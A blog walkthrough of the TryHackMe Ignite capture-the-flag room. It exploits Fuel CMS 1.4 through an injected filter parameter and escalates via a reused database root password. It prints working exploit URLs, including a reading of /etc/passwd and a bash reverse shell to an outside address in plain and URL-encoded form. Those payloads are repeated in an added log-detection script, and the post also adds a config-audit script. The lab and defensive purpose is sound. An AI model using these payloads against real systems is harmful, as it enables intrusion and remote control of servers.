narancs's blog

TryHackMe – Ignite walkthrough

Introduction

This is a post about the Ignite CTF room on TryHackMe. During this CTF we need to do web enumeration, then exploit Fuel CMS using a public exploit for a known CVE, and finally escalate our privileges to root.

Enumeration

After deploying the machine, I did a scan with nmap to see what ports are open.

Apache HTTP server is running on port 80, and nmap also found a disallowed entry (/fuel/) in the robots.txt file.

After visiting the website, we see the starting page of Fuel CMS.

The page reveals that the installed version of Fuel CMS is 1.4, and if we scroll down we can also find the default login credentials.

Exploitation

To log in we need to go to the /fuel page.

The default credentials were not changed, so we can log in as admin with the password admin. Now we have access to the dashboard of Fuel CMS.

I looked around on the dashboard, but I did not find anything that would allow me to run a reverse shell or get access to the host in other ways. Then I started looking for known exploits for this particular version of Fuel CMS, and I found the following on exploit-db: https://www.exploit-db.com/exploits/49487

Using the CVE exploit from Exploit DB

I checked the exploit code and tried to understand how it works. The script requires two command-line arguments: the base path of Fuel CMS and the command that will be executed on the target. The command is stored in a variable called cmd, and it is inserted into the filter GET parameter of the /fuel/pages/select/ page:

url = root_url + "/fuel/pages/select/?filter='%2Bpi(print(%24a%3D'system'))%2B%24a('#{cmd}')%2B'"

To check if this installation is vulnerable to this exploit, I replaced the #{cmd} placeholder with the command cat /etc/passwd. Then I opened the page in my browser. The final URL looks like this:

http://10.10.220.45/fuel/pages/select/?filter='%2Bpi(print(%24a%3D'system'))%2B%24a('cat /etc/passwd')%2B'

When I checked the source code of the page, the content of the passwd file was included at the top, so the exploit worked.

Getting a shell

The next step was to run a reverse shell from the GET parameter in a similar way. There was a small problem: the command included in the URL caused a syntax error on the page, so the reverse shell was not executed. To resolve this, I had to URL encode the Linux command that runs the reverse shell.

The bash reverse shell I used:

/bin/bash -c "bash -i >& /dev/tcp/10.9.8.61/1337 0>&1"

URL encoded with the Burp Suite Decoder module:

%2f%62%69%6e%2f%62%61%73%68%20%2d%63%20%22%62%61%73%68%20%2d%69%20%3e%26%20%2f%64%65%76%2f%74%63%70%2f%31%30%2e%39%2e%38%2e%36%31%2f%31%33%33%37%20%30%3e%26%31%22

Final URL:

http://10.10.220.45/fuel/pages/select/?filter='%2Bpi(print(%24a%3D'system'))%2B%24a('%2f%62%69%6e%2f%62%61%73%68%20%2d%63%20%22%62%61%73%68%20%2d%69%20%3e%26%20%2f%64%65%76%2f%74%63%70%2f%31%30%2e%39%2e%38%2e%36%31%2f%31%33%33%37%20%30%3e%26%31%22')%2B'

I started a netcat listener on port 1337, and after opening the above URL the listener received the connection and I had a shell on the target machine as the www-data user.
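From the defender's side, the shape of this exploit is easy to pick out of the web server logs: every request in this section goes to /fuel/pages/select/ with a filter value that, once URL-decoded, is PHP code ('+pi(print($a='system'))+$a('<command>')+') rather than a search string, and the Burp-encoded form above decodes to exactly the same thing. The script below is an added example of mine, not part of the walkthrough or of the Exploit DB code: it parses Apache combined-format log lines, decodes the filter parameter once, flags values that contain a function call, and pulls out the command the request tried to run. The log lines are constructed for the example (the two injected URLs are the ones used above, with the space sent as %20 as a browser would; client address, timestamps, sizes and user agent are made up), and the list of flagged function names goes a little beyond the page's pi/print/system to cover other PHP execution functions, which is my generalization.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed Apache access-log lines in combined format. The two injected request URLs are the
# ones used in the walkthrough (the browser sends the space in "cat /etc/passwd" as %20); client
# address, timestamps, sizes and user agent are made up for the example.
SAMPLE_LOG = """\
10.9.8.61 - - [12/Mar/2022:10:01:02 +0000] "GET /fuel/ HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.9.8.61 - - [12/Mar/2022:10:01:15 +0000] "GET /fuel/pages/select/?filter='%2Bpi(print(%24a%3D'system'))%2B%24a('cat%20/etc/passwd')%2B' HTTP/1.1" 200 9300 "-" "Mozilla/5.0"
10.9.8.61 - - [12/Mar/2022:10:03:40 +0000] "GET /fuel/pages/select/?filter='%2Bpi(print(%24a%3D'system'))%2B%24a('%2f%62%69%6e%2f%62%61%73%68%20%2d%63%20%22%62%61%73%68%20%2d%69%20%3e%26%20%2f%64%65%76%2f%74%63%70%2f%31%30%2e%39%2e%38%2e%36%31%2f%31%33%33%37%20%30%3e%26%31%22')%2B' HTTP/1.1" 200 312 "-" "Mozilla/5.0"
10.9.8.61 - - [12/Mar/2022:10:05:00 +0000] "GET /fuel/pages/select/?filter=news HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

# Apache combined log format: client, ident, user, [timestamp], "request line", status, ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

# After one round of URL decoding the exploit's filter value reads
#   '+pi(print($a='system'))+$a('<command>')+'
# i.e. PHP code with function calls. A legitimate filter is a plain search string and never
# contains a call, so any "name(" or "$var(" in the decoded value is treated as an injection
# attempt. pi/print/system come from the exploit itself; the rest are other PHP execution
# functions added here as a generalization.
PHP_CALL_RE = re.compile(r"(?:\$\w+|pi|print|system|exec|shell_exec|passthru)\s*\(")

# The command the exploit would run sits in the $a('...') call.
COMMAND_RE = re.compile(r"\$\w+\('(?P<cmd>[^']*)'\)")


def decode_filter(target):
    """Return the URL-decoded 'filter' parameter of a /fuel/pages/select request, else None."""
    parts = urlsplit(target)
    if not parts.path.startswith("/fuel/pages/select"):
        return None
    # parse_qs splits on '&' before decoding, so an encoded %26 inside the payload stays
    # part of the value instead of starting a new parameter.
    values = parse_qs(parts.query, keep_blank_values=True).get("filter")
    return values[0] if values else None


def extract_command(decoded_filter):
    """Return the operating-system command carried by the injected $a('...') call, if any."""
    m = COMMAND_RE.search(decoded_filter)
    return m.group("cmd") if m else None


def scan_log(text):
    """Return one finding per request whose decoded filter parameter contains a PHP call."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        decoded = decode_filter(m.group("target"))
        if decoded is None or not PHP_CALL_RE.search(decoded):
            continue
        findings.append({
            "ip": m.group("ip"),
            "time": m.group("ts"),
            "status": int(m.group("status")),
            "filter": decoded,
            "command": extract_command(decoded),
        })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['time']} {f['ip']} status={f['status']} command={f['command']!r}")
```

To review a real server, pass the contents of /var/log/apache2/access.log to scan_log; on the Ignite box the request that spawned the shell shows up with the decoded bash command in the command field, and the same decoding is what a WAF rule or SIEM parser has to do before matching, since the encoded form on the wire contains none of the obvious strings.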

This shell has limited functionality, so I upgraded to a fully functional shell.

I started looking for the user flag. I checked the home directories; only www-data had one, and the flag was there.

Privilege escalation

One of the first things I checked was the database connection configuration file. On this host it was located at /var/www/html/fuel/application/config/database.php. This file contained the password of the MySQL root user.

The same password was used for the Linux root user as well. I was able to switch to root and get the root flag.
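The configuration weakness behind this escalation can be checked before an attacker gets to it. The script below is an added example of mine, not part of the walkthrough or of Fuel CMS: it parses the CodeIgniter-style $db['default'] array that Fuel CMS's database.php uses (that layout is my assumption; both config texts are constructed samples with placeholder passwords, not the file from the target) and flags an application connecting as the MySQL root account, an empty password, and a world-readable config file. The password reuse itself cannot be seen from this file alone; the fix is a dedicated low-privilege database account with a password used nowhere else, and the hardened sample shows what that looks like.

```python
import os
import re
import stat

# Constructed sample of a Fuel CMS database.php, in the CodeIgniter 3 array layout that Fuel CMS
# uses (assumed layout; hypothetical values, not the file from the target machine).
WEAK_CONFIG = """<?php
$active_group = 'default';
$db['default'] = array(
    'dsn'      => '',
    'hostname' => 'localhost',
    'username' => 'root',
    'password' => 'PLACEHOLDER-shared-root-password',
    'database' => 'fuel_schema',
    'dbdriver' => 'mysqli',
);
"""

# Same file after the fix: a dedicated account that only has rights on the application's schema,
# with a password that is used nowhere else (placeholder value).
HARDENED_CONFIG = """<?php
$active_group = 'default';
$db['default'] = array(
    'dsn'      => '',
    'hostname' => 'localhost',
    'username' => 'fuel_app',
    'password' => 'PLACEHOLDER-unique-app-password',
    'database' => 'fuel_schema',
    'dbdriver' => 'mysqli',
);
"""

DB_ARRAY_RE = re.compile(r"\$db\['default'\]\s*=\s*array\((?P<body>.*?)\);", re.S)
ENTRY_RE = re.compile(r"'(?P<key>\w+)'\s*=>\s*'(?P<val>[^']*)'")


def parse_db_config(text):
    """Return the entries of the $db['default'] array as a dict (empty if the array is missing)."""
    m = DB_ARRAY_RE.search(text)
    if not m:
        return {}
    return {e.group("key"): e.group("val") for e in ENTRY_RE.finditer(m.group("body"))}


def audit_db_config(text, mode=0o640):
    """Return a list of findings for the config text and the file's permission bits."""
    cfg = parse_db_config(text)
    if not cfg:
        return ["could not find the $db['default'] array"]
    findings = []
    if cfg.get("username") == "root":
        findings.append("application connects as the MySQL root account; use a dedicated "
                        "account with privileges on its own schema only")
    if not cfg.get("password"):
        findings.append("database password is empty")
    if mode & stat.S_IROTH:
        findings.append("config file is world-readable, so every local account can read "
                        "the database password")
    return findings


def audit_file(path):
    """Audit a real database.php on disk, using its actual permission bits."""
    with open(path, encoding="utf-8") as fh:
        text = fh.read()
    return audit_db_config(text, os.stat(path).st_mode)


if __name__ == "__main__":
    for name, text, mode in (("weak", WEAK_CONFIG, 0o644), ("hardened", HARDENED_CONFIG, 0o640)):
        print(name, audit_db_config(text, mode) or ["no findings"])
```

On a real server, run audit_file('/var/www/html/fuel/application/config/database.php') as root; the mode check reads the actual permission bits with os.stat. Whether the database password is also an operating-system password has to be checked out of band, and the safe answer is to rotate the Linux root password whenever it is found in an application config.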

Summary

During the Ignite CTF on TryHackMe I was able to exploit a vulnerable version of Fuel CMS. A public exploit available on Exploit DB allowed me to get initial access to the target machine. Then I escalated my privileges to root, which was possible due to critical password reuse: the MySQL root user and the Linux root user had the same password.
